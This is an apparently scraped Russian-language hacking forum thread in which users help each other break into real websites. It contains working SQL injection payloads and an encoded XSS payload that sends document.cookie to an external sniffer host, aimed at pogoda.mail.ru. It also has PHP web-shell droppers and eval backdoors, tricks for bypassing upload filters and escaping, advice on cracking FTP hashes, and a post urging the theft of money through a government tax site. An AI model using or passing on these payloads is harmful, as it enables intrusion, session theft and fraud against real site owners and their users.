i.id HAVING 1=1 AND ( id='a'' OR title like '%a'%' or description like '%a'%' or communication like '%a'%' or other like '%a'%' or contents like '%a'%' or apps like 'a'' or memory like '%a'%' or display like '%a'%' or category like '%a'%' or brand like '%a'%' or processor like '%a'%' or text like 'a'' ) LIMIT 0, 4

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or description like '%a'%' or communication like '%a'%' or other like '%a'' at line 54
параметр передается везде где сейчас a'

2paypoker
%a'%
id='a''
лишная кавычка) попробуй инжектить a') or 1=1+--+

Вопрос такой,можно ли в тиблицах джумлы последних версий,найти урл самого сайта где она стоит,раньше дампил контент и искал по гуглу,а тут контент дефолтный.
спасибо

Что делать если .NET (MSSQL) режет слова, а точнее говорит что это еррор
пробовал в скобки заключать и делать типо %64%40

줄 76: {
줄 77: DsCom.CommandText = szQuery;
줄 78: this.dr = DsCom.ExecuteReader();
줄 79: m_nRowCount = 0;
줄 80: }

[SqlException (0x80131904): 키워드 'or' 근처의 구문이 잘못되었습니다.]
System.Data.SqlClient.SqlConnection.OnError(SqlExc eption exception, Boolean breakConnection) +1950890
System.Data.SqlClient.SqlInternalConnection.OnErro r(SqlException exception, Boolean breakConnection) +4846875
System.Data.SqlClient.TdsParser.ThrowExceptionAndW arning(TdsParserStateObject stateObj) +194
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392
System.Data.SqlClient.SqlDataReader.ConsumeMetaDat a() +33
System.Data.SqlClient.SqlDataReader.get_MetaData() +83
System.Data.SqlClient.SqlCommand.FinishExecuteRead er(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +297
System.Data.SqlClient.SqlCommand.RunExecuteReaderT ds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +954
System.Data.SqlClient.SqlCommand.RunExecuteReader( CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +162
System.Data.SqlClient.SqlCommand.RunExecuteReader( CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +32
System.Data.SqlClient.SqlCommand.ExecuteReader(Com mandBehavior behavior, String method) +141
System.Data.SqlClient.SqlCommand.ExecuteReader() +89
MinWeb.Lib.DBManager.SetDataReader(String szQuery) in d:\WebData\test.com_www\App_Code\MinWebLib_DBManag er.cs:78
Community_Screenshot_View.Page_Load(Object sender, EventArgs e) in d:\WebData\test.com_www\Community\Screenshot\View. aspx.cs:62
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627

Здраствуйте.
Хочу поднять прова root на сервере ОС
FreeBSD 6.3-RELEASE-p5
Сам эксплоит:

/************************************************** *********************************/

/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/*** 2003 / 12 /23 - PRIVATE CODE ***/

/*** Program terminated with signal 11, Segmentation fault. ***/

/*** #0 0xbeefdead in ?? () ***/

/************************************************** *********************************/


I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)


Steps to reproduce:


1. Run ppp

2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxx


This will produce a segmentation violation (Core dumped).


Discovered by: sipher


Shouts: princess^pookie,spithash,burnout,#codemasters,#hac kers@dalnet

Обьясните пожалуйсто что такое "user-ppp" и как его запустить?

Здраствуйте.
Обьясните пожалуйсто что такое "user-ppp" и как его запустить?

ppp (http://www.freebsd.org/doc/ru/books/handbook/ppp-and-slip.html) это модемный сервис в фряхе.

user PPP - это PPP уровня пользователя (http://www.freebsd.org/doc/ru/books/handbook/userppp.html)

Столкнулся со следующей ситуацией:
$pageList = array();
$fileList = array();

$pageList[1] = 'Contact Information';
$pageList[2] = 'Event Information';
$pageList[3] = 'Payment Information';
$pageList[4] = 'Submit';

$fileList[1] = 'ContactBP';
$fileList[2] = 'Events';
$fileList[3] = 'Payment';
$fileList[4] = 'Success';

$file = $fileList[$pageNo];

eval( "{$file}Page::createPage(" . '$pageNo, $pageList, $theme, $fileList );' );



К $pageNO доступ извне есть, но:
1. отсекается $file = $fileList[$pageNo]
2.так же сильно обламывает $fileList = array()

Подскажите, есть ли способ какой-то обойти оба способа "защиты"?

Подскажите, есть ли способ какой-то обойти оба способа "защиты"?
нет.

если Регистр_глобалз=ОН, то
попробуй передать код через переменную
$theme.
примерно такого плата:
; system('ls');/*

Хотя нет, тока заметил, там кавычки одинарные!
ТОгда передай что-нить через $pageNO, отсечётся строчка и $file будет неинициализирован и передай в $file чтонить =)
если я прально етбя понял то должно сработать:

?pageNO=1&file=;system("ls");/*

естественно регистр_глобалс=ОН

Хотя нет, тока заметил, там кавычки одинарные!
ТОгда передай что-нить через $pageNO, отсечётся строчка и $file будет неинициализирован и передай в $file чтонить =)
если я прально етбя понял то должно сработать:

?pageNO=1&file=;system("ls");/*

естественно регистр_глобалс=ОН Ты хоть сам проверяшь то, что советуешь? $file будет инициализирован пустым значением.

если к примеру я могу залить картинку,но когда переименовываю шелл в расширение картинки и двиг при аплоаде его бьет,то по какому принципу едет проверка ?
я просто не знаю в какую строну копать

скорее всего сигнатура проверяется. попробуй захексить, но эт маловероятный прогон :(

если к примеру я могу залить картинку,но когда переименовываю шелл в расширение картинки и двиг при аплоаде его бьет,то по какому принципу едет проверка ?
я просто не знаю в какую строну копать
Ресайз картинки, тут ничего не сделать.

скорее всего сигнатура проверяется. попробуй захексить, но эт маловероятный прогон :(
Поясни пожалуйста. Какая сигнатура может проверяться (желательно с реализацией хотя-бы приблизительной) и что ты посоветовал ему захексить?

Shadrin
Проверок при загрузке картинок не так много, основные это расширение, Content-Type, прогон через например getimagesize().

Если расширение грамотно проверяется через белый список, то грузятся только разрешённые, но можно прогрузить картинку под последующий LFI. Если идёт дополнительная проверка например getimagesize(), то всё-равно можно впихать код в метаданные.

А вот если, как сказал BlackSun, над картинкой начинают издеваться, (ресайз или какие-то другие преобразования при которых теряются метаданные) то это уже не обойти, и даже под LFI ты уже ничего не загрузишь.

Есть ещё куча вариантов, это основные, ну и надеюсь нам it's my сейчас объяснит, что он имел ввиду под "захексить", и как это помогает обходу.

А твои "u6afc%u4deb%uf9e8%uffff%u60ff" это не шифрование, это шеллкод, машинные команды. Интересуют шеллкоды?
http://metasploit.com:55555/PAYLOADS
http://metasploit.com/shellcode/

И дизассемблер в руки.

Такой вопрос... Где на серваке хранятся пасы и логины от фтп? Нарыл на хосте файлы-
Например:
4651318.conf

<VirtualHost xxx.xxx.xxx.xxx>
User XXX
Group XXX

DisplayLogin /home/XXX/.ftp/welcome.msg
DisplayChdir README
DisplayConnect /local/home/XXX/.ftp/connect.msg

ServerAdmin "user@mail.com"
ServerName "ftp"

4651318.passwd

user1:/hA1SwNZWf7Gw:1295:1295:comment:home/host:/nonexistant
anonymous:x:1295:1295:comment:home/host:/nonexistant
user2:/hA1SwNZWf7Gw:1295:1295:comment:home/host:/nonexistant

Как понял в файлах *.conf хранятся логины и майлы, а в *.passwd логины и пасы?
Не пинайте сильно если ошибаюсь...

да, такой способ,если не ошибаюсь, у Plesk панели.Это конфиги из диры ftp. расшифруешь хеш - получишь доступ к фтп.
Два файла - не очень удобно, но зато есть доступ c шелла к хешам и ты сразу знаешь к какому сайту брутишь хеш, и соответственно, решаешь - надо ли он тебе))

Ты хоть сам проверяшь то, что советуешь? $file будет инициализирован пустым значением.
ну почему же. Если написали

1. отсекается $file = $fileList[$pageNo]

я так понимаю, этой строки в коде вообще тогда нет, значит я прав

Если расширение грамотно проверяется через белый список, то грузятся только разрешённые, но можно прогрузить картинку под последующий LFI. Если идёт дополнительная проверка например getimagesize(), то всё-равно можно впихать код в метаданные.

а можете обьсянить,насчет LFI,и впихать код в метаданные,где можно прочесть про это?на примерах желательно.
з,ы
я пробовал перехватить запрос,поменял контент тайп,и расширение,он его так и не залил,хотя в админки была на него сылка,в расширении пхп.

спасибо :)

$n@ke "расшифруешь хеш - получишь доступ к фтп."
Не отходя от темы. Может кто подскажет каким алгоритмом зашифрованы пассы такого вида /hA1SwNZWf7Gw Покопался в таблицах определения и не нашёл ничего похожего.

Не отходя от темы. Может кто подскажет каким алгоритмом зашифрованы пассы такого вида /hA1SwNZWf7Gw Покопался в таблицах определения и не нашёл ничего похожего.
DES(Unix)

а можете обьсянить,насчет LFI,и впихать код в метаданные,где можно прочесть про это?на примерах желательно.

Вот тут почитай, достаточно подробно и доступно:
http://habrahabr.ru/blogs/php/44610/
http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

1. отсекается $file = $fileList[$pageNo]

я так понимаю, этой строки в коде вообще тогда нет, значит я прав Брр, на том коде который показали выше, то что ты предложил - не сработает. Твой ответ не понял.

<img height=0 width=0 src="http://cayt.ru/who.php">

с помошью каких ещё тегов можно автоматически заставить скрипт сработать , как только загрузится страница с кодом?

нужен список тегов которые смогут заставить сработать скрипт :/

iframe (src), frameset/frame (src), имхо любой тег (опция background), link (rel="stylesheet" type="text/css" media="all" href="script.php"), script (src), style (@import)

я ваще валенок в этом
<img height=0 width=0 src="http://cayt.ru/who.php">
ты можешь мне написать в таком виде?

я ваще валенок в этом
<img height=0 width=0 src="http://cayt.ru/who.php">
ты можешь мне написать в таком виде?
<iframe src="http://cayt.ru/who.php" width=0 height=0></iframe>

Всем привет. Такой вопрос, сможет ли отгородить от скл иньекций, класс который обрабатывает все POST и GET запросы и если находит в них такие запросы как:
' -- '
' /* '
' %00 '
срабатывает die();

Нет.

Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?

Почему не защитит? Как можно обойти?
Не надо изобретать велосипед, всё уже придуманно до нас, фильтруй не фильтруй, а что то да забудешь, да и глупо это ... А обойти это можно очень легко :)


а если добавить в фильтр отсеивание запросов таких как union,select и т.д?

Тоже лажа выйдет :) Обходится легко, ты лучше предоставь скрипт, а мы тебе скажем, как обойти :)

Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
не нужно писать свои чудофильтры, есть стандартные функции, просто нужно научиться ими пользоваться.
https://forum.antichat.ru/thread30641.html

Почему не защитит? Как можно обойти?
а если добавить в фильтр отсеивание запросов таких как union,select и т.д?
Что ты херней то страдаешь? Фильтруй параметры через addslashes и все.

Допустим вот

class InitVars {
# Недопустимые слова в запросах
var $deny_words = array("union","char","select","update","group","order","benchmark");

function checkVars()# Метод проверяет $_GET и $_POST переменные на наличие опасных данных и SQL инъекций
{
global $DB;
//Проверка опасных данных.
$_VAR = array_merge ( $_POST, $_GET);

foreach($_VAR as $_ind => $_val)
{
$exp = explode(" ",$_val);
foreach($exp as $ind => $val)
{
if(in_array(strtolower($val),$this->deny_words) OR stristr($val,"--") OR stristr($val,"/*") OR stristr($val,"%00")) $this->antihack("Ваш запрос не может быть обработан системой.");
}
}
}

}

Те кто меня учит фильтровать отвечаю - не надо меня учить я и сам все прекрасно знаю, как все фильтруется...я задал другой вопрос...

И ты уверен, что все и всегда юзают пробел? Что будет с твоим фильтром, если вместо пробела окажется табуляция или переход на новую строку? Запрос так же можно обрезать с помошью #. И не забывай о фрагментированных иньекциях (кавычку отфильтровали, но слеш - нет, благодаря чему, в зависимости от запроса, один хер можно провести иньекцию). Ах да, можно обойтись и без табов с каретками, юзая скобки.

спасибо, все понял:)

Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>

и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.

Поможете?

IND1G0, этот твой фильтр все, кто знаком со скулями не первый день, обойдут. Методов вагон и маленькая тележка.

Да и к чему пустая трата времени при написании недо-фильтров, если есть нормальные методы: https://forum.antichat.ru/thread30641.html

Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>

и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.

Поможете?
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(String.fromCharCode(105,109,103,32,61,32,110, 101,119,32,73,109,97,103,101,40,41,59,32,105,109,1 03,46,115,114,99,32,61,32,34,104,116,116,112,58,47 ,47,115,110,105,102,102,101,114,46,120,97,107,110, 101,116,46,114,117,47,115,109,105,108,101,115,47,1 05,109,103,95,95,49,51,57,50,46,103,105,102,63,34, 43,100,111,99,117,109,101,110,116,46,99,111,111,10 7,105,101,59))</script><!--+
не забудь пробелы вырезать

BlackSun, и без чара обойтись можно :).
Cehennem, я тебе уже говорил, "+" воспринимается как пробел. Для XSS используй %2B.

http://haytour.am/login.asp

a 4to takoe tam Authorization key: 4to zdelat snim??

http://haytour.am/login.asp

a 4to takoe tam Authorization key: 4to zdelat snim??
Загружать с компа :) если у тебя его нет, значит ты не админ (но это совсем не говорит о том, что если он у тебя есть, то ты админ :)), а если ты не админ, значит пи*дуешь дальше, так как ничего не светит (по крайней мере авторизоваться :p)...

Ну там же понятно что это админ панель
И для более безопасной работы сайта ввели "Authorization key", только проверенные люди админа могут это ввести:(

http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(String.fromCharCode(105,109,103,32,61,32,110, 101,119,32,73,109,97,103,101,40,41,59,32,105,109,1 03,46,115,114,99,32,61,32,34,104,116,116,112,58,47 ,47,115,110,105,102,102,101,114,46,120,97,107,110, 101,116,46,114,117,47,115,109,105,108,101,115,47,1 05,109,103,95,95,49,51,57,50,46,103,105,102,63,34, 43,100,111,99,117,109,101,110,116,46,99,111,111,10 7,105,101,59))</script><!--+
не забудь пробелы вырезать

А я чёта не понял, какой сниффер? Куда идут куки?

img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;
0o токо тсссссссссс.....

img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;


Я его вместо xss поставил но не сработало.

Cehennem
Кавычки слэшируются, из-за этого не пашет, надо закодировать ссылку.
Для кодирования используй, к примеру: http://ha.ckers.org/xss.html, а лучше http://kaimi.ru/2009/06/универсальный-конвертр-текста-1-0/. Там закодируй в String.fromCharCode. А BlackSun закодировал твою ссылку, куки идут к тебе на снифер.

http://quest.fsb-my.name/code.php

Cehennem
Кавычки слэшируются, из-за этого не пашет, надо закодировать ссылку.

Значит кавычки шлифуются, всё понятно. Сделаю ссылку типа www.site.com/sссылка для сниффер/ и проверю.
Всем спасибо ребята.
И ещё хотел бы поделится с вами, я нашёл на одном сайте xss, а сайт не простой сайт, сайт государственный, на этом сайте у жителей всего Азербайджана, тоесть у миллионов азербайджанцев есть шот, они хранять свои денги. Есть некоторые у которых есть милйарды долларов на счёте. Пользовател может за минуту перевести все свои денги из счёта в другой счёт. Через xss думаю можно ломануть.
Вот сайт: http://www.e-taxes.gov.az/
xss: http://www.taxes.gov.az/?name=birpencere (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/TaxPayerChecker.jsp (в поле пишем html команду).
xss: https://www.e-taxes.gov.az/ebyn/edvPayerChecker.jsp (в поле пишем html команду).

Всего нашёл 3-е xss. И ещё скажу что сайт не сайт, а всё дырка!

Так-что ломайте перевадите денги на свой счёт и кайфуйте пока за вами не пришёл Азербайджанский ФБР.

Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:

<?php
echo 'LOL';
?>

То он успешно выполняется, но если залить такой:

<?php
eval($_GET['lol']);
?>

То белая страница. Вот и всё...

Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые.

GET запросы могут фильтроваться. В смысле просто слово GET

Попробуй действовать через пост, например так:

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>


PS: неоднократно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"

В общем рыть в сторону POST вариантов, имхо

ЗЫЖ Плюс

eval($_GET['lol']);

можно смело заменить на

eval($_GET[lol]);

в прямом и переносном смысле - может быть будет другой результат, не мне тебе объяснять, что каждая ситуация всегда практически уникальна

Эксперементировать с ? и & после сам знаешь чего - как не тупо бы выглядело бы - результат иногда разный

<?php
eval($_GET['lol']);
?>
а что ты передаеш в lol ??
и вообще должна быть ошибка Undefended variable $_GET['lol']

То белая страница. Вот и всё...

Ну а что там должно быть-то?

и вообще должна быть ошибка Undefended variable $_GET['lol']
Не обязательно. Как раз белая страница может быть запросто

неоднакратно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"
Покажешь пример?

eval($_GET[lol]);

ЧУДО! Спс, вот до этого я не допёр. Да, теперь этот код пашет. Но проблемма с заливкой нормального шелла всё ещё стоит...

jokester:

Покажешь пример?


Зачем? Вы же ГУРУ хакинга, наверное, даже скорее всего я несу бред. Но сегодня простительно:) Всех с праздником!

Но проблемма с заливкой нормального шелла всё ещё стоит...


скорее всего только с правами на запись в папку, выполни такой код, чтобы найти сам знаешь что:

Поиск папки, доступной на запись:

0)<?
// это system('cd ../; find . -perm -2 -type d -ls');
eval(base64_decode(c3lzdGVtKCdjZCAuLi87IGZpbmQgLiA tcGVybSAtMiAtdHlwZSBkIC1scycpOw));
?>

1) $dirs=scandir($_SERVER['DOCUMENT_ROOT']);foreach($dirs as $whot) {if(is_dir($whot) && is_writable($whot)){echo "writeable dir: $whot";}}

2) echo '<pre>';$path = '/абсолютный_путь/http';function fold($rootDir, $allData=array()){$invisibleFileNames = array(".", "..");$dirContent = scandir($rootDir);foreach($dirContent as $key => $content){$path = $rootDir.'/'.$content;if(!in_array($content,$invisibleFileNam es)){if(is_file($path) && is_writable($path)){$allData[] = $path; }elseif(is_dir($path) && is_writable($path)){$allData = fold($path, $allData);}}}return $allData;}$a = fold($path);print_r($a);echo '</pre>';

Про запись в папку это и так думаю понятно, в противном случае я никаких файлов создать бы там не смог. Папка на запись есть.

Но судя по всему даже через Базу 64 образуется типа \' что то в этом роде, что и делает скрипт нерабочим... хз даже чё тут придумать.

ну дык ты попробововал вот этот код без кавычек?

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>


если зальешь в туже папку, откуда он исполняется - должно быть ок. В смысле торможу щаз децл, просто трудно оценивать не видя реальной ситуцации

Если реагирует на то, что в коде шелла/загрузчика есть кавычки - избавиться от кавычек. Имхо.

ну дык ты попробововал вот этот код без кавычек?

<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>


если зальешь в туже папку, откуда он исполняется - должно быть ок. В смысле торможу щаз децл, просто трудно оценивать не видя реальной ситуцации

Если реагирует на то, что в коде шелла/загрузчика есть кавычки - избавиться от кавычек. Имхо.
не пашет. сам php код вместе с html заливается норм, но рядом файла не создаёт

Виртуально удаленно трудно судить. Единственное, что могу сказать напоследок - если работает eval - шеллу таки быть ;) Просто надо напрячься децл. Удачи и с праздником!

PS: Попробуй залить картинку обычную для начала. Если не прокатит - тогда думать. Не лей сразу шелл.

Nightmarе

phpinfo(); покажи:

allow_url_fopen
allow_url_include
magic_quotes_gpc
disable_functions
safe_mode

SELECT `listings`.`sid` as `object_sid`, COUNT(*) as `count` FROM `listings` JOIN `listings_properties` ON `listings`.`sid` = `listings_properties`.`object_sid` WHERE 1 AND (0 OR(1 AND (`id`='MakeModel' AND `value` IN(311{SQLinj})) ) ) GROUP BY `listings_properties`.`object_sid` or order 1#
Подскажите как иньекцию всунуть, что не пробовал постоянно ошибка. можно менять только ")) ) ) GROUP BY `listings_properties`.`object_sid` or order 1#"

Nightmarе

phpinfo(); покажи:

allow_url_fopen
allow_url_include
magic_quotes_gpc
disable_functions
safe_mode
allow_url_fopen On
allow_url_include Off
magic_quotes_gpc On
disable_functions no value
safe_mode Off

Nightmarе
copy($_GET[a], $_GET[b]);&a=http://site.com/shell.txt&b=./shell.php

Nightmarе
copy($_GET[a], $_GET[b]);&a=http://site.com/shell.txt&b=./shell.php
Тоже самое. белая страница, впринципе с самого начала я это пробовал.

FAQ666,

311)) ) ) GROUP BY `listings_properties`.`object_sid` and 1=2 union select 1,2,3.../*

Nightmarе
Залей
<?php eval(stripslashes($_REQUEST[c])); ?>
и работай нормально через system, или через что угодно, magic_quotes мешать не будут

FAQ666,

311)) ) ) GROUP BY `listings_properties`.`object_sid` and 1=2 union select 1,2,3.../*
Спасибо помогло)))

Nightmarе
Залей
<?php lol(stripslashes($_REQUEST[c])); ?>
и работай нормально через system, или через что угодно, magic_quotes мешать не будут
И всё равно никак ;(

и так:
fputs(fopen($_GET[ass],a),base64_decode(stripslashes($_POST[lol])));

тоже не пашет, то есть заливается шелл но полностью покоцанный и не рабочий ;(

2 Nightmarе:

Всё дело в HTML-коде внутри любого шелла. Его просто надо переделать в ECHO "а тут html-код". Иначе через eval есс-но работать не будет. Или написать "правильную" функцию для корректной работы шелла с чистым html внутри себя.

Т.е. в итоге будет достаточно залить чистый base64_encode код шелла в файл на сервере, без <? и ?>

Но таких готовых шеллов нет, никто так не пишет:)) Ну или в паблик не выкладывает. Вывод - ручками. Как? Очень просто. Сидим и построчно заменяем "чистый html" на

echo 'тут html_код';

вот и всё. Или пишем мегафункцию на все случаи жизни, которой в паблике нет 100% - для корректного исполнения php кода, содержащий в себе чистый html


т.е., чтобы было понятно:

1. Cработает:


<?
$a = "phpinfo();";
eval ($a);
?>


2. Сработает:


<?
$a = "phpinfo();";
$a = base64_encode($a);
eval (base64_decode($a));
?>


Т.е. остается только залить base64_encode код шелла, без <? и ?> и еще не закодированный он когда, там должен быть "правильный" html, не отделенный от php-кода никакими <? и ?>, т.е. шелл, состоящий сплошь из "чистого" php, без htm-отдельных-вставок в центре кода. Т.е. еще раз (сам уже запутался, гы) - весь чистый, отдельный вынесенный html надо заменить на

echo "html-код";

закодировать такой шелл в base64, залить (получиться файло без кавычек, значит прокатит 100%, как при sql-inj при заливке файла) на сервер, а потом просто eval-нуть, т.е. по пунктам:

1. Заливаешь такой файл на сервер, назовем такой файл user1.php:

<?eval($_SERVER[HTTP_USER_AGENT]);?> - будет работать 100%, кавычек нет, зальется без изменений

2. Заливаешь на сервер другой файл, в котором "правильный" base64_encode шелла (с правильными html) - назовем такой файл user.php (закодированный без <? и ?>) - будет работать 100%, кавычек нет, зальется без изменений

3. Идешь в FF и создаешь такого юзер-агента в плагине user agent switcher:

Description: eval(base64)
User agent: $a=file_get_contents('user.php');eval(base64_decod e($a));

и всё, у тебя шелл

PS: Пункт №2 можно выполнить либо удаленно, либо через предварительно залитую форму загрузки с локального компа - зависит от настроек в php.ini

И такая защита, как наблюдается у тебя там, обломается

Или не читать весь бред, что выше про FF (раньше так делал, гы) и просто залить правильный base64 шелла и выполнить его через eval - что в принципе одно и тоже

Или пишем мегафункцию на все случаи жизни, которой в паблике нет 100% - для корректного исполнения php кода, содержащий в себе чистый html
Пиздец, это пиздец ..

Pashkela большое спасибо.
Посидел минут 20, переделал wso2 шелл убрав HTML код, и заработало!!!!!!!

Пиздец, это пиздец ..

Ну может я чего и не знаю, у меня wso2-шелл через eval не заработал. Вместо того, чтобы ругаться матом в общественном форуме, лучше бы выложил такую функцию, позволяющую запускать смешанный php и html код через eval.

Кругом какие-то неуравновешанные люди:)

Ну может я чего и не знаю, у меня wso2-шелл через eval не заработал. Вместо того, чтобы ругаться матом в общественном форуме, лучше бы выложил такую функцию, позволяющую запускать смешанный php и html код через eval.

Кругом какие-то неуравновешанные люди:)
Лучше прекрати нести откровенную ***ню на форуме, это уже нихера не смешно и начинает раздражать!

eval('?><html>ох ебать, хтмл в евале!<body><?php phpinfo(); ?></body></html>');

BlackSun:

Ну да, по пьяни такие вещи лучше не проверять:) Работает и WSO2 так. Не раздражайся, я не специально, доктора уже выехали:) Какая бы херня не была, человеку помог, в отличие от некоторых "с понтами"

Nightmarе:


Посидел минут 20, переделал wso2 шелл убрав HTML код, и заработало!!!!!!!


Ну и зря. Просто перевел бы тот же wso2.php в base64(без <? и ?>), залил бы и выполнил бы так:

1. Залить такой шелл -

<?eval(stripslashes($_GET[e]));?>// будет работать даже с magic_quotes=on

2.

?e = $a = file_get_contents("wso2.php");eval(base64_decode($a));

Вот в принципе и всё, что надо было. А я там понаписал - мама не горюй:) Надо завязывать

Как выполнить PHP-код, если можно заливать файл с любым расширением?

НО есть два условия:

1. Структура файла должна быть как у картинки.
2. После заливки скрипт меняет расширение картинки на 340x340, соответственно весь код, который написан в конце картинки сгорает.

mailbrush, а скрипт только сжимает до 320х340? если так, то есть возможность указать ложные exif данные и залить в конец код.

Залил картинку с белым фоном 1х1 он растянул до 340х340. 500х500 - уменьшил до 340х340. Вот так... И как указать эти данные?

А ты не пробовал заливать именно 340х340? Мб там стоит проверка и при данных размерах ресайза не будет?

FastStone Image Viewer - бесплатная, может менять EXIF

FastStone Image Viewer - бесплатная, может менять EXIF
После ресайза средствами пыха от EXIF'а остаются только воспоминания.

А ты не пробовал заливать именно 340х340


Если ресайз в любом случае - то да, не прокатит

Проверки нету. Ресайз идет.
Значит никак?

Вроде нет, ну по крайней мере я не знаю

Ктонить знает, радмин в2.1 и в 2.2 по умалчанию хранит ли логи?
Стоит мне об этом беспокоиться?
Плиз. дайте совет. (с меня +)

Radmin server впринципе сохраняет в лог-файл
Для долбоёбов, я даже специально выделил слово "умалчаение"

[QUOTE=Explоit]Я имео ввиду по умалчанию, я даже выделил это слово жирно/QUOTE]

Всё обыскал, всех опросил, ну никто не знает хранит ли Радмин логи по умАлчанию(( так что ничем помочь наверно не смогу.

Но вот мануаль,который так трудно было найти на сайте производителя Радмин, и в гугле его вобще нет на первом месте в странице результатов
(ССылка на мануаль, ВЫ ТОЛЬКО ПРЕДСТАВЬТЕ!!!!!!! на ВТОРОМ МЕСТЕ!!ААА..какой ужас) предложил вариант со словом умОлчание, хотя это конечно бред скорее всего, но может и что-то полезное будет.

Для тех,кто не хочет тратить свое время, я подчеркиваю, для ДОЛБО..ой, то есть для Exploit, привожу фрагмент мануала:

Протоколирование
Все действия программы могут заноситься в протокол (лог-файл). Чтобы включить
протоколирование, запустите «Настройки Remote Administrator server» (Settings for Remote
Administrator server) из группы Radmin в меню «Пуск». Нажмите кнопку «Опции…» (Options).
Включите опцию «Вести протокол» (Use logfile) и сохраните изменения нажатием кнопки
«OK».
В среде Windows NT 4.0/2000/XP/2003 возможно внесение записей не только в собственный
лог-файл, но и в журнал событий (Event Log).

Нет, по дефолту не хранит.

